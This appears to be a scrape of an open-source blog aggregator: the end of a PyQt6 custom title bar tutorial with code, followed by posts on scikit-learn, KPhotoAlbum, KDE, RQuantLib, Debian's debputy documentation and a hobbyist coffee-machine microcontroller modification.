python from PyQt6.QtCore import QEvent, QSize, Qt from PyQt6.QtGui import QIcon from PyQt6.QtWidgets import ( QApplication, QHBoxLayout, QLabel, QMainWindow, QStyle, QToolButton, QVBoxLayout, QWidget, ) class CustomTitleBar(QWidget): def __init__(self, parent): super().__init__(parent) self.initial_pos = None title_bar_layout = QHBoxLayout(self) title_bar_layout.setContentsMargins(1, 1, 1, 1) title_bar_layout.setSpacing(2) self.title = QLabel(f"{self.__class__.__name__}", self) self.title.setAlignment(Qt.AlignmentFlag.AlignCenter) self.title.setStyleSheet( """ QLabel { text-transform: uppercase; font-size: 10pt; margin-left: 48px; } """ ) if title := parent.windowTitle(): self.title.setText(title) title_bar_layout.addWidget(self.title) # Min button self.min_button = QToolButton(self) min_icon = QIcon() min_icon.addFile("min.svg") self.min_button.setIcon(min_icon) self.min_button.clicked.connect(self.window().showMinimized) # Max button self.max_button = QToolButton(self) max_icon = QIcon() max_icon.addFile("max.svg") self.max_button.setIcon(max_icon) self.max_button.clicked.connect(self.window().showMaximized) # Close button self.close_button = QToolButton(self) close_icon = QIcon() close_icon.addFile("close.svg") # Close has only a single state. self.close_button.setIcon(close_icon) self.close_button.clicked.connect(self.window().close) # Normal button self.normal_button = QToolButton(self) normal_icon = QIcon() normal_icon.addFile("normal.svg") self.normal_button.setIcon(normal_icon) self.normal_button.clicked.connect(self.window().showNormal) self.normal_button.setVisible(False) # Add buttons buttons = [ self.min_button, self.normal_button, self.max_button, self.close_button, ] for button in buttons: button.setFocusPolicy(Qt.FocusPolicy.NoFocus) button.setFixedSize(QSize(16, 16)) button.setStyleSheet( """QToolButton { border: none; padding: 2px; } """ ) title_bar_layout.addWidget(button) def window_state_changed(self, state): if state == Qt.WindowState.WindowMaximized: self.normal_button.setVisible(True) self.max_button.setVisible(False) else: self.normal_button.setVisible(False) self.max_button.setVisible(True) class MainWindow(QMainWindow): def __init__(self): super().__init__() self.setWindowTitle("Custom Title Bar") self.resize(400, 200) self.setWindowFlags(Qt.WindowType.FramelessWindowHint) self.setAttribute(Qt.WidgetAttribute.WA_TranslucentBackground) central_widget = QWidget() # This container holds the window contents, so we can style it. central_widget.setObjectName("Container") central_widget.setStyleSheet( """#Container { background: qlineargradient(x1:0 y1:0, x2:1 y2:1, stop:0 #051c2a stop:1 #44315f); border-radius: 5px; }""" ) self.title_bar = CustomTitleBar(self) work_space_layout = QVBoxLayout() work_space_layout.setContentsMargins(11, 11, 11, 11) work_space_layout.addWidget(QLabel("Hello, World!", self)) centra_widget_layout = QVBoxLayout() centra_widget_layout.setContentsMargins(0, 0, 0, 0) centra_widget_layout.setAlignment(Qt.AlignmentFlag.AlignTop) centra_widget_layout.addWidget(self.title_bar) centra_widget_layout.addLayout(work_space_layout) central_widget.setLayout(centra_widget_layout) self.setCentralWidget(central_widget) def changeEvent(self, event): if event.type() == QEvent.Type.WindowStateChange: self.title_bar.window_state_changed(self.windowState()) super().changeEvent(event) event.accept() def window_state_changed(self, state): self.normal_button.setVisible(state == Qt.WindowState.WindowMaximized) self.max_button.setVisible(state != Qt.WindowState.WindowMaximized) def mousePressEvent(self, event): if event.button() == Qt.MouseButton.LeftButton: self.initial_pos = event.position().toPoint() super().mousePressEvent(event) event.accept() def mouseMoveEvent(self, event): if self.initial_pos is not None: delta = event.position().toPoint() - self.initial_pos self.window().move( self.window().x() + delta.x(), self.window().y() + delta.y(), ) super().mouseMoveEvent(event) event.accept() def mouseReleaseEvent(self, event): self.initial_pos = None super().mouseReleaseEvent(event) event.accept() if __name__ == "__main__": app = QApplication([]) window = MainWindow() window.show() app.exec() ConclusionIn this tutorial, we have learned the fundamentals of creating custom title bars in PyQt. To do this, we have combined PyQt's widgets, layouts, and styling capabilities to create a visually appealing title bar for a PyQt app.
With this skill under your belt, you're now ready to create title bars that align perfectly with your application's unique style and branding. This will allow you to break away from the standard window decoration provided by your operating system and add a personal touch to your user interface.
Now let your imagination run and transform your PyQt application's UX.
qtatech.com blog: Expert Help on Deck: The Importance of a Drupal Maintenance Service for Your Business
In today's digital age, it is crucial for businesses to have a strong online presence. With the rise of content management systems like Drupal, companies are able to create and manage their websites with ease. However, as with any technology, regular maintenance is necessary to ensure the smooth functioning and security of your website. This is where a Drupal maintenance service comes in.
PyCharm: What is the Django Web Framework?
LN Webworks: Is Drupal best CMS for Health, Wellness, and Fitness Organizations
As health, wellness, and fitness organizations navigate the ever-evolving digital space, the need for a versatile content management system (CMS) has become increasingly important. Out of the many CMS, Drupal has emerged as a frontrunner for these organizations, offering an all-rounded suite of features that smoothly align with their specific requirements.
In fact, did you know that some of the top health, wellness, and fitness giants like the American Heart Association, Mayo Clinic, National Cancer Institute, and YMCA rely on Drupal for healthcare solutions?
In the preceding sections, let’s have a detailed look at some of the top reasons that make Drupal the best choice for health, wellness, and fitness organizations.
We will also take a moment to highlight its ability to enhance online engagement, streamline content management, and cultivate a flourishing digital presence.
scikit-learn: My mentored internship at scikit-learn
How it is to be an Intern at scikit-learn
My name is Stefanie Senger, and I recently concluded a five-month mentored internship at scikit-learn, that had been funded by NumFocus as a Small Development Grant with a clear focus on fostering diversity in open-source projects. The idea to couple a grant with mentorship traces back to Maren Westermann’s initiative. She envisioned a pathway to integrate more female coders into scikit-learn through internships and support. Scikit-learn would profit from fresh perspectives and some disruption. I was the guinea pig for an initial experiment, as Maren later told me.
Starting the InternshipAs someone transitioning from a non-technical background to coding, working on scikit-learn was a big thing for me. I had participated in and taught at a data science boot camp, searching diligently for a first role in the field. I never doubted I could tackle more difficult tech challenges over time, but I knew there was much to learn. Scikit-learn had a heavy-tech aura to me, and when I discovered the internship ad, I just thought: this. I was genuinely taken aback when accepted for the role, though. There are many more experienced people looking for such an opportunity, after all.
When I got to know better both my mentors, Adrin Jalali and Guillaume Lemaitre, it became quickly clear that only effort was required, and I could ask them any question along the way. I felt very welcome in the community, also by the other people I interacted with on GitHub.
What I Worked onI began by working on documentation and examples such as “Multi-class AdaBoosted Decision Trees,” to make those more comprehensive and helpful for users. Then some maintenance tasks on the code that were repetitive so I could find out what to do from other contributors’ pull requests. Guillaume discovered that one AdaBoost algorithm required deprecation, and it fell on me to execute this. I had never looked at such a huge code base with so many layers of abstraction, and I had to learn quite some more Python to be able to go ahead. I even got the opportunity to present an “Intro to scikit-learn” workshop at EuroSciPy, the European conference on the scientific use of Python in Basel, where I also got to know many other contributors and people from the scikit-learn team at Inria.
Adrin introduced me to the challenging task of implementing a new feature for metadata routing, developed over many years by the scikit-learn community. It allows users to set metadata, such as sample weights, in meta estimators, that can be routed to sub-estimators and other algorithms that are able to consume it. This was partly uncharted territory and meant finding solutions where there was no predefined path and adapting tests to match the expected behavior. In the last two months of my internship, I implemented metadata routing into some meta-estimators, which was tremendously difficult but, once accomplished, has nourished my professional confidence since.
Mentorship in ActionLet me describe how the mentoring worked because Guillaume’s and Adrin’s support was invaluable. They would both literally drop their tasks when I had questions and right away hint me in the right direction. I met Adrin twice a week, and we would co-work while I would throw questions at him. Guillaume was available remotely, and I knew he would jump into a video call with me when I needed help. They both gave reviewing my PRs a priority, and I got feedback on my work regularly.
It was essential to have mentors signaling that it’s okay to be learning and to propose tasks to me. If I had come into the project individually, I might have hesitated to take on most of the issues I ended up working on, fearing that my skills were insufficient and that I would hinder the progress of the project rather than help it. The mentoring setting gave me a justification to try things that I wasn’t sure if I could do.
Becoming a Community MemberLooking ahead, I will continue contributing to scikit-learn. As I’ve gotten to know quite a few of the other contributors in person, I now feel part of the community. I know they care about values like openness and diversity, that I share, and while acknowledging the complexity of the code base, I know what I can learn from taking on issues and the sense of accomplishment when merging my solution into the main branch. And I love contributing to something meaningful, which is something I had always sought.
Anniversary release: KPhotoAlbum 5.12.0
We're happy to announce the new release 5.12.0 of KPhotoAlbum, the KDE photo management program!
20 years KPhotoAlbumThis is some kind of "special" release, as exactly 20 years ago, on 2003-11-27, version 1.0 was tagged (we tagged this release already on saturday, so that it will hit the mirrors and we can publish this release announcement at this very date though ;-).
20 years is quite a long time for such a "small" FLOSS project. Enough times, nice programs die from bit rot, because the only dev or too many of the few lose interest in it, don't need it anymore and/or nobody wants to take over maintainership. Happily, this is not the case for KPA! After all these years, the project is still alive and kicking, and – when the family, the job and everything else allow it (after all, we're all not fulltime KPA devs), we work on it to make it better.
Just speaking of me, I joined the project back in 2014, almost ten years ago now (which is arguably also quite a long period of time). And I'm really proud to still be a part of this great project :-)
So, I think it's time to especially thank Jesper Pedersen for initiating the project back then, and Johannes Zarl-Zierl for taking over the maintainership and being the project leader since 2019! Joyfully, Jesper never really stopped contributing to KPA and still works on it until now.
After all, we're still – without too much self-laudation – a small but excellent crew of FLOSS enthusiasts ;-)
But about the release itself:
What's new? BugfixesMost notably, we could fix a really big amount of crashes and unexpected behavior. The following bug reports could be closed as "fixed": #472427, #472523, #473231, #473324, #473587, #473762, #474151, #474392, #475387, #475388, #475529, #475585, #476131, #476561, #476651, #476862 and #477195. That's quite an impressive list, isn't it?!
Kudos to our new super-diligent beta tester Victor Lobo for filing 17 of those bug reports alone, always providing meaningful information about how to reproduce the issue and tirelessly testing the fixes. Thank you! As a dev, you really appreciate this! Apart from that, also big thanks to Pierre Etchemaïté and Andreas Schleth for providing equivalently excellent bug reports!
Thanks to you all for helping making KPhotoAlbum better!
New features and changesApart from that, there are also some new interesting features:
- Support annotating images from the viewer by using letters to assign tags. Use the context menu and select "Annotate | Assign Tags" to enable. More information is available in the KPhotoAlbum handbook.
- Add option to sort category page by natural order (feature #475339). Natural sort order takes the locale into account and sorts numeric values properly (e.g. sort "9" before "10").
- Allow selecting a date range in the DateBar via keyboard (Use "Shift + Left|Right")
- Allow closing the annotation dialog's fullscreen preview using the Escape key.
… as well as sone changes:
- In the viewer window, using the letters A-Z to assign tokens now needs to be explicitly enabled. You can do this by opening the context menu and selecting "Annotate | Assign Tokens".
- When KPhotoAlbum is started in demo mode and a previously saved demo database exists, the old demo database is no longer overwritten.
- The ui.rc file (kphotoalbumui.rc) is now deployed as a Qt resource instead of an on-disk file.
- Improved usability of "Invoke external program" menu (#474819)
- No longer set the default shortcut for "Use current video frame in thumbnail view" to Ctrl+S and avoid shortcut conflict.
- Restrict context menu entries for fullscreen preview of annotation dialog to a sane set of actions.
- It is no longer possible to annotate images from the viewer by pressing "/" and typing tag names.
- It is no longer possible to change an image through the annotation dialog's fullscreen image preview.
According to git, the following individuals pushed commits:
- Yuri Chornoivan
- Friedrich W. H. Kossebau
- Nicholas Leggiero
- Tobias Leupold
- Alexander Lohnau
- Scarlett Moore
- Jesper K. Pedersen
- Johannes Zarl-Zierl
Thanks for spending your time with coding on KPA and for contributing your work!
Have a lot of fun with the new release, and keep KPA the best photo management program out there, also for the 20 years to come :-)
My work in KDE for November 2023
We’re already in November, but I managed to do a lot of work this month which I’m really happy about.
Quickly something that’s not strictly programming: I was accepted as a member of KDE e.V. early this month, thank you all very much! I was also given moderation powers on Discuss so maybe it will stop rate limiting me when moving posts around.
I also went on a crusade of merging and triaging merge requests on Invent, which some of you might’ve seen. Notably I was able to take care one or two pages worth of open MRs, which I’m really happy about.
Without further ado, let’s begin.
Plasma #Feature Merged the Game Controller KCM into Plasma, starting with a simple rewrite in QML. I’m aiming to add back the visual representation in 6.1 (which still exists in the standalone repository if you want to take a shot at it.) At least for right now the code is much better and it supports more devices than the 5.X Joystick KCM ever could. 6.0
The new and not much improved Game Controller KCMMy hope is that since it’s much cleaner and easier to work with, it would invite more contributors… and it’s already doing that as we speak! :-)
NeoChat #Feature Blockquotes now look more like quotes, and no longer just somewhat indented blocks of text. 24.02
New blockquote stylingsBugfix You can now right-click (or long tap) on rooms to access the context menu without switching to it. I gave the treatment for spaces a while back. 24.02
Feature Added UnifiedPush support! It’s functional already and I have used it to receive push notifications even when NeoChat is closed. 24.02
Tokodon #Feature I merged the post redesign I was teasing on Mastodon, which includes better margins and standalone tags. 24.02
The new post design, which includes standalone tags!Feature The language selector is now a regular dialog and not the buggy custom combo box we had before. It now displays the native language name, if available. 24.02
The new language selectorFeature Muting and blocking users has been accessible through profile pages, and now those actions are present in the post menu like on Mastodon Web. Useful for taking action against harmful users without navigating to a cesspool of a profile too. 24.02
Feature Added a report dialog. It’s a little basic right now, which I want to improve before release. 24.02
The new report dialogFeature Rebased and merged Rishi’s Moderation Tool, which works fantastic and I used this to test my reporting feature! 24.02
Feature Added a way to filter out boosts and replies from timeline pages. 24.02
New filter controlsFeature Added supports for lists. You can’t add people to lists (you must use another client to do that) but you can at least view and manage them. 24.02
New list management Kiten #Bugfix Marked the X11 socket as fallback. This removes a warning on the Flathub page about the deprecated windowing system. 23.08
Now the Flathub page is all green!Bugfix Numerous UI improvements, such as improving the margins of configuration dialogs. I also redid the toolbar layout. 24.02
The new toolbar layoutFeature Added a search function to the Kanji browser. 24.02
Kirigami #Bugfix Fixed an edge cases of ToolBar incubation, which liked to spam logs. I squashed some other log spam, so Kirigami applications should be less noisy. 6.0
Feature Added a property to FlexColumn that allows you to read the inner column’s width. We use this in Tokodon to set the width of the separator between posts. 6.0
Craft #I’m getting addicted to fixing Craft recipes, and there’s a lot to fix in the upcoming 6.0 megarelease:
- Preparing Tokodon for Qt6
- Preparing MPV for an eventual Windows build by only requiring Linux-specific video APIs on Linux
- Added a blueprint for MpvQt for future use in Tokodon and PlasmaTube
- Added a KUnifiedPush blueprint for future use in Tokodon and NeoChat
- Preparing KWeatherCore for Qt6
- Preparing KWeather for Qt6
Feature Improved the look of it’s KCM. Not only does it look nice, and it’s design is more in line with other list based ones.
The new look for the Push Notifications KCM! PlasmaTube #Feature Added better hover effects for video items. I did a bunch of refactoring to unify the two types (list and grid) so they work better in general (especially for keyboard-only navigation.) 24.02
Feature Added a video queue system, which is exactly what you think it is. You can queue up an entire playlist, or add videos manually like on YouTube. 24.02
Feature Different types of search results is supported now, so you can find channels and playlists. 24.02
Feature Public Piped instances are now fetched and displayed on initial setup. 24.02
Feature Features of PlasmaTube that are unsupported by the current video source are now disabled or hidden. This should result in less buggy and broken looking behavior depending on which video source you use. 24.02
Feature Added support for MPRIS, which is used by the Media Player applet, the lockscreen and KDE Connect. 24.02
Accessibility #Bugfix Fixed our spinboxes not being read correctly by screen readers, since they were editable by default. Now the accessible descriptions and other data is passed down to the text field. Fixed in QQC2 Desktop Style (used on Plasma Desktop) and QQC2 Breeze Style (Plasma Mobile and Android.) 6.0
Documentation #Found lots more missing Bugzilla links in Invent, and did some more README updating!
- Added missing Bugzilla link for Ruqola
- Updated README for Kiten, adding a screenshot
- Added Snap store links for NeoChat and Tokodon
- Added missing Bugzilla product for kdesrc-build
- Expanded plasma-integration’s README
- Wrote the README for our new Accessibility Inspector
- Expanded the README for qqc2-desktop-style, and now contains usage information and why it’s different than qqc2-breeze-style. Did the same for qqc2-breeze-style too
Bugfix Fixed the setup wizard. 24.02
Upcoming #Feature Not merged yet, but I’m adding a pen calibration tool to the Tablet KCM. If you have the required equipment and can test, please help out! It’s cutting it close to the feature freeze, so this will most likely be pushed off until 6.1.
The new calibratorSee you in December!
Paolo Melchiorre: 2024 Django Software Foundation board nomination
My self-nomination statement for the 2024 Django Software Foundation (DSF) board of directors elections
TestDriven.io: Django REST Framework and Elasticsearch
Dirk Eddelbuettel: RQuantLib 0.4.20 on CRAN: More Maintenance
A new release 0.4.20 of RQuantLib arrived at CRAN earlier today, and has already been uploaded to Debian as well.
QuantLib is a rather comprehensice free/open-source library for quantitative finance. RQuantLib connects (some parts of) it to the R environment and language, and has been part of CRAN for more than twenty years (!!) as it was one of the first packages I uploaded there.
This release of RQuantLib brings a few more updates for nags triggered by recent changes in the upcoming R release (aka ‘r-devel’, usually due in April). The Rd parser now identifies curly braces that lack a preceding macro, usually a typo as it was here which affected three files. The printf (or alike) format checker found two more small issues. The run-time checker for examples was unhappy with the callable bond example so we only run it in interactive mode now. Lastly I had alread commented-out the setting for a C++14 compilation (required by the remaining Boost headers) as C++14 has been the default since R 4.2.0 (with suitable compilers, at least). Those who need it explicitly will have to uncomment the line in src/Makevars.in. Lastly, the expand printf format strings also found a need for a small change in Rcpp so the development version (now 1.0.11.5) has that addressed; the change will be part of Rcpp 1.0.12 in January.
Changes in RQuantLib version 0.4.20 (2023-11-26)Correct three help pages with stray curly braces
Correct two printf format strings
Comment-out explicit selection of C++14
Wrap one example inside 'if (interactive())' to not exceed total running time limit at CRAN checks
Courtesy of my CRANberries, there is also a diffstat report for the this release 0.4.20. As always, more detailed information is on the RQuantLib page. Questions, comments etc should go to the rquantlib-devel mailing list. Issue tickets can be filed at the GitHub repo.
If you like this or other open-source work I do, you can now sponsor me at GitHub.
This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.
Andrew Cater: MiniDebConf Cambridge - 26th November 2023 - Afternoon sessions
Sadly, nothing too much to report.
I delivered a very quick three slides lightning talk on Accessibility, WCAG [Web Content Accessibility Guidelines] version 2.2 and a request for Debian to do better
WCAG 2.2: WCAG 2.2 Abstract
Debian-accessibility mailing list link: debian-accessibility
I watched the other lightning talks but then left at 1500 - missing three good talks - to drive home at least partly in daylight.
A great four days - the chance to put some names to faces and to recharge in Debian spaces.
Thanks to Cambridge Debian folk for helping arrange evening meals, lifts and so on and especially to those who also happen be ARM employees who were badging us in and out through the four days
Thanks to those who staffed Front Desk on both days and, especially, also to the ARM security guards who let us into site at 0745 on all four days and to Mark who did the weekend shift inside the building for Saturday and Sunday.
Thanks to ARM for excellent facilities, food, coffee, hosting us and coffee, to Codethink for sponsoring - and a lecture from Sudip and some interesting hardware - and Pexip for Pexip sponsorship (and employee attendance).
Here's to the next opportunity, whenever that may be.
Niels Thykier: Providing online reference documentation for debputy
I do not think seasoned Debian contributors quite appreciate how much knowledge we have picked up and internalized. As an example, when I need to look up documentation for debhelper, I generally know which manpage to look in. I suspect most long time contributors would be able to a similar thing (maybe down 2-3 manpages). But new contributors does not have the luxury of years of experience. This problem is by no means unique to debhelper.
One thing that debhelper does very well, is that it is hard for users to tell where a addon "starts" and debhelper "ends". It is clear you use addons, but the transition in and out of third party provided tools is generally smooth. This is a sign that things "just work(tm)".
Except when it comes to documentation. Here, debhelper's static documentation does not include documentation for third party tooling. If you think from a debhelper maintainer's perspective, this seems obvious. Embedding documentation for all the third-party code would be very hard work, a layer-violation, etc.. But from a user perspective, we should not have to care "who" provides "what". As as user, I want to understand how this works and the more hoops I have to jump through to get that understanding, the more frustrated I will be with the toolstack.
With this, I came to the conclusion that the best way to help users and solve the problem of finding the documentation was to provide "online documentation". It should be possible to ask debputy, "What attributes can I use in install-man?" or "What does path-metadata do?". Additionally, the lookup should work the same no matter if debputy provided the feature or some third-party plugin did. In the future, perhaps also other types of documentation such as tutorials or how-to guides.
Below, I have some tentative results of my work so far. There are some improvements to be done. Notably, the commands for these documentation features are still treated a "plugin" subcommand features and should probably have its own top level "ask-me-anything" subcommand in the future.
Automatic discard rulesSince the introduction of install rules, debputy has included an automatic filter mechanism that prunes out unwanted content. In 0.1.9, these filters have been named "Automatic discard rules" and you can now ask debputy to list them.
$ debputy plugin list automatic-discard-rules +-----------------------+-------------+ | Name | Provided By | +-----------------------+-------------+ | python-cache-files | debputy | | la-files | debputy | | backup-files | debputy | | version-control-paths | debputy | | gnu-info-dir-file | debputy | | debian-dir | debputy | | doxygen-cruft-files | debputy | +-----------------------+-------------+For these rules, the provider can both provide a description but also an example of their usage.
$ debputy plugin show automatic-discard-rules la-files Automatic Discard Rule: la-files ================================ Documentation: Discards any .la files beneath /usr/lib Example ------- /usr/lib/libfoo.la << Discarded (directly by the rule) /usr/lib/libfoo.so.1.0.0The example is a live example. That is, the provider will provide debputy with a scenario and the expected outcome of that scenario. Here is the concrete code in debputy that registers this example:
api.automatic_discard_rule( "la-files", _debputy_prune_la_files, rule_reference_documentation="Discards any .la files beneath /usr/lib", examples=automatic_discard_rule_example( "usr/lib/libfoo.la", ("usr/lib/libfoo.so.1.0.0", False), ), )When showing the example, debputy will validate the example matches what the plugin provider intended. Lets say I was to introduce a bug in the code, so that the discard rule no longer worked. Then debputy would start to show the following:
# Output if the code or example is broken $ debputy plugin show automatic-discard-rules la-files [...] Automatic Discard Rule: la-files ================================ Documentation: Discards any .la files beneath /usr/lib Example ------- /usr/lib/libfoo.la !! INCONSISTENT (code: keep, example: discard) /usr/lib/libfoo.so.1.0.0 debputy: warning: The example was inconsistent. Please file a bug against the plugin debputyObviously, it would be better if this validation could be added directly as a plugin test, so the CI pipeline would catch it. That is one my personal TODO list. :)
One final remark about automatic discard rules before moving on. In 0.1.9, debputy will also list any path automatically discarded by one of these rules in the build output to make sure that the automatic discard rule feature is more discoverable.
Plugable manifest rules like the install ruleIn the manifest, there are several places where rules can be provided by plugins. To make life easier for users, debputy can now since 0.1.8 list all provided rules:
$ debputy plugin list plugable-manifest-rules +-------------------------------+------------------------------+-------------+ | Rule Name | Rule Type | Provided By | +-------------------------------+------------------------------+-------------+ | install | InstallRule | debputy | | install-docs | InstallRule | debputy | | install-examples | InstallRule | debputy | | install-doc | InstallRule | debputy | | install-example | InstallRule | debputy | | install-man | InstallRule | debputy | | discard | InstallRule | debputy | | move | TransformationRule | debputy | | remove | TransformationRule | debputy | | [...] | [...] | [...] | | remove | DpkgMaintscriptHelperCommand | debputy | | rename | DpkgMaintscriptHelperCommand | debputy | | cross-compiling | ManifestCondition | debputy | | can-execute-compiled-binaries | ManifestCondition | debputy | | run-build-time-tests | ManifestCondition | debputy | | [...] | [...] | [...] | +-------------------------------+------------------------------+-------------+(Output trimmed a bit for space reasons)
And you can then ask debputy to describe any of these rules:
$ debputy plugin show plugable-manifest-rules install Generic install (`install`) =========================== The generic `install` rule can be used to install arbitrary paths into packages and is *similar* to how `dh_install` from debhelper works. It is a two "primary" uses. 1) The classic "install into directory" similar to the standard `dh_install` 2) The "install as" similar to `dh-exec`'s `foo => bar` feature. Attributes: - `source` (conditional): string `sources` (conditional): List of string A path match (`source`) or a list of path matches (`sources`) defining the source path(s) to be installed. [...] - `dest-dir` (optional): string A path defining the destination *directory*. [...] - `into` (optional): string or a list of string A path defining the destination *directory*. [...] - `as` (optional): string A path defining the path to install the source as. [...] - `when` (optional): manifest condition (string or mapping of string) A condition as defined in [Conditional rules](https://salsa.debian.org/debian/debputy/-/blob/main/MANIFEST-FORMAT.md#Conditional rules). This rule enforces the following restrictions: - The rule must use exactly one of: `source`, `sources` - The attribute `as` cannot be used with any of: `dest-dir`, `sources` [...](Output trimmed a bit for space reasons)
All the attributes and restrictions are auto-computed by debputy from information provided by the plugin. The associated documentation for each attribute is supplied by the plugin itself, The debputy API validates that all attributes are covered and the documentation does not describe non-existing fields. This ensures that you as a plugin provider never forget to document new attributes when you add them later.
The debputy API for manifest rules are not quite stable yet. So currently only debputy provides rules here. However, it is my intention to lift that restriction in the future.
I got the idea of supporting online validated examples when I was building this feature. However, sadly, I have not gotten around to supporting it yet.
Manifest variables like {{PACKAGE}}I also added a similar documentation feature for manifest variables such as {{PACKAGE}}. When I implemented this, I realized listing all manifest variables by default would probably be counter productive to new users. As an example, if you list all variables by default it would include DEB_HOST_MULTIARCH (the most common case) side-by-side with the the much less used DEB_BUILD_MULTIARCH and the even lessor used DEB_TARGET_MULTIARCH variable. Having them side-by-side implies they are of equal importance, which they are not. As an example, the ballpark number of unique packages for which DEB_TARGET_MULTIARCH is useful can be counted on two hands (and maybe two feet if you consider gcc-X distinct from gcc-Y).
This is one of the cases, where experience makes us blind. Many of us probably have the "show me everything and I will find what I need" mentality. But that requires experience to be able to pull that off - especially if all alternatives are presented as equals. The cross-building terminology has proven to notoriously match poorly to people's expectation.
Therefore, I took a deliberate choice to reduce the list of shown variables by default and in the output explicitly list what filters were active. In the current version of debputy (0.1.9), the listing of manifest-variables look something like this:
$ debputy plugin list manifest-variables +----------------------------------+----------------------------------------+------+-------------+ | Variable (use via: `{{ NAME }}`) | Value | Flag | Provided by | +----------------------------------+----------------------------------------+------+-------------+ | DEB_HOST_ARCH | amd64 | | debputy | | [... other DEB_HOST_* vars ...] | [...] | | debputy | | DEB_HOST_MULTIARCH | x86_64-linux-gnu | | debputy | | DEB_SOURCE | debputy | | debputy | | DEB_VERSION | 0.1.8 | | debputy | | DEB_VERSION_EPOCH_UPSTREAM | 0.1.8 | | debputy | | DEB_VERSION_UPSTREAM | 0.1.8 | | debputy | | DEB_VERSION_UPSTREAM_REVISION | 0.1.8 | | debputy | | PACKAGE | <package-name> | | debputy | | path:BASH_COMPLETION_DIR | /usr/share/bash-completion/completions | | debputy | +----------------------------------+----------------------------------------+------+-------------+ +-----------------------+--------+-------------------------------------------------------+ | Variable type | Value | Option | +-----------------------+--------+-------------------------------------------------------+ | Token variables | hidden | --show-token-variables OR --show-all-variables | | Special use variables | hidden | --show-special-case-variables OR --show-all-variables | +-----------------------+--------+-------------------------------------------------------+I will probably tweak the concrete listing in the future. Personally, I am considering to provide short-hands variables for some of the DEB_HOST_* variables and then hide the DEB_HOST_* group from the default view as well. Maybe something like ARCH and MULTIARCH, which would default to their DEB_HOST_* counter part. This variable could then have extended documentation that high lights DEB_HOST_<X> as its source and imply that there are special cases for cross-building where you might need DEB_BUILD_<X> or DEB_TARGET_<X>.
Speaking of variable documentation, you can also lookup the documentation for a given manifest variable:
$ debputy plugin show manifest-variables path:BASH_COMPLETION_DIR Variable: path:BASH_COMPLETION_DIR ================================== Documentation: Directory to install bash completions into Resolved: /usr/share/bash-completion/completions Plugin: debputyThis was my update on online reference documentation for debputy. I hope you found it useful. :)
ThanksOn a closing note, I would like to thanks Jochen Sprickerhof, Andres Salomon, Paul Gevers for their recent contributions to debputy. Jochen and Paul provided a number of real world cases where debputy would crash or not work, which have now been fixed. Andres and Paul also provided corrections to the documentation.
Ian Jackson: Hacking my filter coffee machine
I hacked my coffee machine to let me turn it on from upstairs in bed :-). Read on for explanation, circuit diagrams, 3D models, firmware source code, and pictures.
- Background: the Morphy Richards filter coffee machine
- Planning
- Inside the Morphy Richards filter coffee machine
- Unexpected electrical hazard
- Design approach
- Implementation - hardware
- Implementation - software
- Results
- Epilogue
- Bonus pictures
I have a Morphy Richards filter coffee machine. It makes very good coffee. But the display and firmware are quite annoying:
After it has finished making the coffee, it will keep the coffee warm using its hotplate, but only for 25 minutes. If you want to make a batch and drink it over the course of the morning that’s far too short.
It has a timer function. But it only has a 12 hour clock! You can’t retire upstairs on a Friday night, having programmed the coffee machine to make you coffee at a suitable post-lie-in time. If you try, you are greeted with apparently-inexplicably-cold coffee.
The buttons and UI are very confusing. For example, if it’s just sitting there keeping the coffee warm, and you pour the last, you want to turn it off. So you press the power button. Then the display lights up as if you’ve just turned it on! (The power LED is in the power button, which your finger is on.) If you know this you can get used to it, but it can confuse guests.
Also, I’m lazy and wanted to be able to cause coffee to exist from upstairs in bed, without having to make a special trip down just to turn the machine on.
PlanningMy original feeling was “I can’t be bothered dealing with the coffee machine innards” so I thought I would make a mechanical contraption to physically press the coffee machine’s “on” button.
I could have my contraption press the button to turn the machine on (timed, or triggered remotely), and then periodically in pairs to reset the 25-minute keep-warm timer.
But a friend pointed me at a blog post by Andy Bradford, where Andy recounts modifying his coffee machine, adding an ESP8266 and connecting it to his MQTT-based Home Assistant setup.
I looked at the pictures and they looked very similar to my machine. I decided to take a look inside.
Inside the Morphy Richards filter coffee machineMy coffee machine seemed to be very similar to Andy’s. His disassembly report was very helpful. Inside I found the high-voltage parts with the heating elements, and the front panel with the display and buttons.
I spent a while poking about, masuring things, and so on.
Unexpected electrical hazardAt one point I wanted to use my storage oscilloscope to capture the duration and amplitude of the “beep” signal. I needed to connect the ’scope ground to the UI board’s ground plane, but then when I switched the coffee machine on at the wall socket, it tripped the house’s RCD.
It turns out that the “low voltage” UI board is coupled to the mains. In my setting, there’s an offset of about 8V between the UI board ground plane, and true earth. (In my house the neutral is about 2-3V away from true earth.)
This alarmed me rather. To me, this means that my modifications needed to still properly electrically isolate everything connected to the UI board from anything external to the coffee machine’s housing.
In Andy’s design, I think the internal UI board ground plane is directly brought out to an external USB-A connector. This means that if there were a neutral fault, the USB-A connector would be at live potential, possibly creating an electrocution or fire hazard. I made a comment in Andy Bradford’s blog, reporting this issue, but it doesn’t seem to have appeared. This is all quite alarming. I hope Andy is OK!
Design approachI don’t have an MQTT setup at home, or an installation of Home Assistant. I didn’t feel like adding a lot of complicated software to my life, if I could avoid it. Nor did I feel like writing a web UI myself. I’ve done that before, but I’m lazy and in this case my requirements were quite modest.
Also, the need for electrical isolation would further complicate any attempt to do something sophisticated (that could, for example, sense the state of the coffee machine).
I already had a Tasmota-based cloud-free smart plug, which controls the fairy lights on our gazebo. We just operate that through its web UI. So, I decided I would add a small and stupid microcontroller. The microcontroller would be powered via a smart plug and an off-the-shelf USB power supply.
The microcontroller would have no inputs. It would simply simulate an “on” button press once at startup, and thereafter two presses every 24 minutes. After the 4th double press the microcontroller would stop, leaving the coffee machine to time out itself, after a total period of about 2h.
Implementation - hardwareI used a DigiSpark board with an ATTiny85. One of the GPIOs is connected to an optoisolator, whose output transistor is wired across the UI board’s “on” button.
(click for diagram scans as pdfs).
The DigiSpark has just a USB tongue, which is very wobbly in a normal USB socket. I designed a 3D printed case which also had an approximation of the rest of the USB A plug. The plug is out of spec; our printer won’t go fine enough - and anyway, the shield is supposed to be metal, not fragile plastic. But it fit in the USB PSU I was using, satisfactorily if a bit stiffly, and also into the connector for programming via my laptop.
Inside the coffee machine, there’s the boundary between the original, coupled to mains, UI board, and the isolated low voltage of the microcontroller. I used a reasonably substantial cable to bring out the low voltage connection, past all the other hazardous innards, to make sure it stays isolated.
